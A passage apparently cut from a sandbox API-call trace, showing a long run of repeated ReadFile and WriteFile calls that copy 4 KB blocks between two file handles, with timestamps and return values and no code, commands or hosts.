lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.715] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.715] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.715] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.716] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.716] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.717] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.717] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.717] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.717] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.717] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.717] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.717] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.718] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.718] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.718] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.718] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.718] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.718] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.718] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.719] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.719] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.719] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.719] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.719] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.719] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.720] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.720] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.721] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.721] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.721] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.721] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.721] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.721] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.721] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.721] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.722] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.722] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.722] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.722] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.722] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.722] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.722] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.722] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.723] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.723] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.723] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.723] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.723] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.723] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.723] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.724] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.724] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.724] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.724] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.724] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.724] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.724] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.725] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.725] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.725] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.725] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.725] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.725] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.726] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.726] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.726] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.726] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.727] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.727] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.727] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.727] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.727] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.727] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.727] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.727] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.728] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.728] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.728] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.728] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.728] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.729] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.729] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.729] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.729] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.729] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.729] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.729] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.729] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.885] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.885] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.885] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.885] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.885] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.885] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.885] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.886] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.886] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.886] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.886] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.886] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.886] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.886] 